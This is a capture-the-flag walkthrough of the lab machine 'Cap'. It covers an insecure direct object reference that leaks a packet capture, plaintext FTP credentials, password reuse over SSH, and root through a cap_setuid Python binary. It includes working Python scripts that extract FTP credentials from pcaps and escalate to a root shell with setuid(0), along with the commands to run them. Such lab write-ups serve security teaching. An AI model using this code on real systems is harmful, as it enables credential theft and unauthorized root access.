Cap

TARGET IP: 10.10.10.245

HOST IP: 10.10.16.3

RECON

WEBSITE

  • The site looks like a data-analytics dashboard, and we are already signed in as Nathan without having logged in.

  • The dropdown under the user's name is inert: none of its entries, including Logout, link anywhere or do anything.

  • Take a look at the source code:

  • There is a lot there but it looks like we have some new information:

    • We have a user named Nathan and possibly other users Rashed, Kaji Patha, and Ratul Hamba.

  • Pulling the response headers with curl shows a gunicorn Server header but no version number.

  • If we go to the home tab in the upper right and click on Network Status, the page itself tells us which sockets the machine has open, so we get useful recon before running an Nmap scan.

    • Ports 21, 22, and 80 appear to be open. This is the target's own view of its listeners, so it is still worth confirming with a scan.

  • Searching from the search bar returns nothing, but a parameter is appended to the URL.

  • I captured the request with Burp Suite and received the following.

  • Let's try the Security Snapshot button. This appears to grab some packet data over a 5 second period and creates a pcap file to look at.

  • The snapshot URL carries a numeric ID that is 1 after the first capture and increments with each new one. Nothing appears to tie that ID to our session (a classic insecure direct object reference), so let's set it to 0 and see what it returns. We'll also grab the pcap file from it.

  • We can open this pcap file in wireshark to take a look at it and see if we can find any good information.

  • Scanning through the Wireshark capture, we quickly find FTP credentials for the user nathan. FTP sends the USER and PASS commands in cleartext, so they sit in plain view in the TCP stream on port 21.

  • We can now log into nathan's FTP account, list the current working directory, and download the user flag.

  • Back on our host we can read the text file for the first flag.
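The credential harvesting step above can be done without Wireshark. The following is an added example, not code from the original write-up: a minimal classic-pcap parser that walks the Ethernet/IPv4/TCP frames and pairs each FTP USER command with the PASS that follows it on the same client connection. The capture embedded below is constructed inline as a stand-in for the file served at /data/0; the IP addresses are the ones listed at the top of this page, the password and port numbers are invented.

```python
import struct
import sys

LINKTYPE_ETHERNET = 1
FTP_PORT = 21
PCAP_MAGIC_LE = 0xA1B2C3D4

TARGET_IP = bytes([10, 10, 10, 245])
HOST_IP = bytes([10, 10, 16, 3])


def _frame(src_ip, dst_ip, sport, dport, payload):
    """Ethernet/IPv4/TCP frame around payload. Checksums are left zero; the parser
    below never validates them, which is fine for a constructed sample."""
    eth = b"\x00" * 12 + b"\x08\x00"                       # dst MAC, src MAC, EtherType IPv4
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 8192, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0, src_ip, dst_ip)
    return eth + ip + tcp


def build_pcap(frames):
    """Wrap frames in a classic little-endian pcap file (global header + record headers)."""
    out = [struct.pack("<IHHiIII", PCAP_MAGIC_LE, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)]
    for i, frame in enumerate(frames):
        out.append(struct.pack("<IIII", 1_600_000_000 + i, 0, len(frame), len(frame)))
        out.append(frame)
    return b"".join(out)


# Constructed sample capture: FTP banner, a USER/PASS login, and an unrelated HTTP request.
SAMPLE_PCAP = build_pcap([
    _frame(TARGET_IP, HOST_IP, 21, 40210, b"220 FTP server ready\r\n"),
    _frame(HOST_IP, TARGET_IP, 40210, 21, b"USER nathan\r\n"),
    _frame(TARGET_IP, HOST_IP, 21, 40210, b"331 Please specify the password.\r\n"),
    _frame(HOST_IP, TARGET_IP, 40210, 21, b"PASS constructed-secret\r\n"),
    _frame(HOST_IP, TARGET_IP, 40211, 80, b"GET / HTTP/1.1\r\nHost: cap\r\n\r\n"),
])


def iter_packets(data):
    """Yield the raw bytes of each record in a classic pcap file (either byte order)."""
    (magic,) = struct.unpack("<I", data[:4])
    if magic == PCAP_MAGIC_LE:
        end = "<"
    elif magic == 0xD4C3B2A1:
        end = ">"
    else:
        raise ValueError("not a classic pcap file (pcapng is not handled here)")
    (linktype,) = struct.unpack(end + "I", data[20:24])
    if linktype != LINKTYPE_ETHERNET:
        raise ValueError(f"unsupported link type {linktype}")
    off = 24
    while off + 16 <= len(data):
        _, _, incl_len, _ = struct.unpack(end + "IIII", data[off:off + 16])
        off += 16
        yield data[off:off + incl_len]
        off += incl_len


def _dotted(b):
    return ".".join(str(x) for x in b)


def tcp_payload(frame):
    """Return (src_ip, dst_ip, sport, dport, payload) for an IPv4/TCP frame, else None."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    if ip[9] != 6:                                          # IP protocol 6 = TCP
        return None
    (total_len,) = struct.unpack("!H", ip[2:4])
    tcp = ip[ihl:total_len]
    sport, dport = struct.unpack("!HH", tcp[:4])
    doff = (tcp[12] >> 4) * 4                               # TCP data offset in bytes
    return _dotted(ip[12:16]), _dotted(ip[16:20]), sport, dport, tcp[doff:]


def extract_ftp_credentials(data):
    """Pair each USER with the PASS that follows it on the same client connection.
    Returns a list of (server_ip, username, password)."""
    creds = []
    pending = {}                                            # (client_ip, client_port) -> username
    for frame in iter_packets(data):
        parsed = tcp_payload(frame)
        if parsed is None:
            continue
        src, dst, sport, dport, payload = parsed
        if dport != FTP_PORT or not payload:                # only client -> server control traffic
            continue
        for line in payload.decode("ascii", "replace").splitlines():
            cmd, _, arg = line.partition(" ")
            if cmd.upper() == "USER":
                pending[(src, sport)] = arg
            elif cmd.upper() == "PASS" and (src, sport) in pending:
                creds.append((dst, pending.pop((src, sport)), arg))
    return creds


if __name__ == "__main__":
    raw = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_PCAP
    for server, user, password in extract_ftp_credentials(raw):
        print(f"{server}  {user}:{password}")
```

Run it against a real download with `python3 ftpcreds.py 0.pcap`; with no argument it runs on the constructed sample. Wireshark's "Follow TCP Stream" does the same job interactively, and the more general tool for this is a protocol dissector such as tshark's `-Y ftp.request.command` filter.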

WAPPALYZER

  • The backend Language appears to be Python

  • Uses Gunicorn as the web server

    • The Gunicorn "Green Unicorn" is a Python Web Server Gateway Interface HTTP server. It is a pre-fork worker model, ported from Ruby's Unicorn project. The Gunicorn server is broadly compatible with a number of web frameworks, simply implemented, light on server resources, and fairly fast.

NMAP

ENUMERATION

GOBUSTER

SUBDOMAIN

  • None of these are new to me, and they don't provide any new information.

TARGET ENUMERATION

  • Now that we have credentials for nathan, we can spend some time exploring the target system for possible privilege escalation.

  • Let's try the same credentials over SSH; passwords are frequently reused between services.

  • Check what, if anything, we are allowed to run through sudo.

  • Unfortunately, we have no sudo rights, so let's go digging around.

  • I spent some time digging around myself but didn't find anything, so I uploaded a copy of linpeas to the target and ran it to automate the enumeration.

  • I came across something interesting.

  • I can verify the capability with the following command. Linux file capabilities let a specific binary carry a chosen subset of root's privileges without being SUID, so they are a finer-grained cousin of SUID with the same escalation potential.

  • This is great information: a binary with cap_setuid in its permitted set can call setuid(0) and become root, so it is a particularly dangerous finding.

  • Hacktricks and GTFOBins both have sections for exploiting this for privilege escalation.

  • Let's go with the privilege escalation from GTFOBins.

  • And now I have root privileges.

  • Let's go get the root flag.
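To make the capability step concrete, here is an added example (not code from the original write-up): a parser for getcap output that flags binaries carrying capabilities dangerous enough to escalate with, plus the GTFOBins cap_setuid technique as a function to run inside the capable interpreter. The getcap sample is constructed and illustrative; the page does not name the binary found on this box, and the example assumes, as GTFOBins does, that it is a Python interpreter.

```python
import os
import re
import sys

# Capabilities that by themselves let a process become root or bypass DAC checks.
DANGEROUS_CAPS = {
    "cap_setuid", "cap_setgid", "cap_sys_admin", "cap_dac_override",
    "cap_dac_read_search", "cap_sys_ptrace", "cap_sys_module", "cap_chown",
    "cap_fowner", "cap_setfcap", "cap_sys_rawio",
}

# Constructed sample of `getcap -r / 2>/dev/null` output in the legacy
# "path = caps+flags" layout. Paths and capability sets are illustrative.
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
"""

# One clause: comma-separated cap names, an operator (= + -), then flag letters e/i/p.
_CLAUSE = re.compile(r"^([a-z0-9_,]+)([=+-])([eip]*)$")


def parse_getcap(output):
    """Parse getcap output into (path, capability, flags) tuples.

    Handles both the legacy "path = caps+ep" layout and the newer "path caps=ep"
    layout printed by recent libcap. Paths containing spaces are not handled.
    """
    entries = []
    for line in output.splitlines():
        line = line.strip()
        if not line:
            continue
        if " = " in line:
            path, _, capspec = line.partition(" = ")
        else:
            path, _, capspec = line.rpartition(" ")
        for clause in capspec.split():
            m = _CLAUSE.match(clause)
            if not m or m.group(2) == "-":          # "-" removes caps from a set; nothing to flag
                continue
            for cap in m.group(1).split(","):
                entries.append((path, cap, m.group(3)))
    return entries


def find_privesc_candidates(output):
    """Binaries whose permitted or effective set includes a dangerous capability."""
    return [
        (path, cap)
        for path, cap, flags in parse_getcap(output)
        if cap in DANGEROUS_CAPS and ("p" in flags or "e" in flags)
    ]


def become_root_and_shell():
    """GTFOBins cap_setuid technique. Run this *inside* the interpreter that carries
    cap_setuid: setuid(0) then succeeds and the spawned shell runs as uid 0.
    Returns False instead of raising when the interpreter lacks the capability."""
    try:
        os.setuid(0)
    except PermissionError:
        return False
    os.execl("/bin/sh", "sh")                   # does not return on success


if __name__ == "__main__":
    if "--escalate" in sys.argv:
        if not become_root_and_shell():
            print("setuid(0) refused: this interpreter does not have cap_setuid")
    else:
        text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_GETCAP
        for path, cap in find_privesc_candidates(text):
            print(f"{path}: {cap}")
```

Feed it live output with `getcap -r / 2>/dev/null | python3 caps.py`, then invoke the flagged interpreter with the escalation path, e.g. `/usr/bin/python3.8 caps.py --escalate`. The `-p`-style caveat from SUID shells does not apply here: once setuid(0) succeeds the real, effective and saved UIDs are all 0, so an ordinary shell keeps root.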
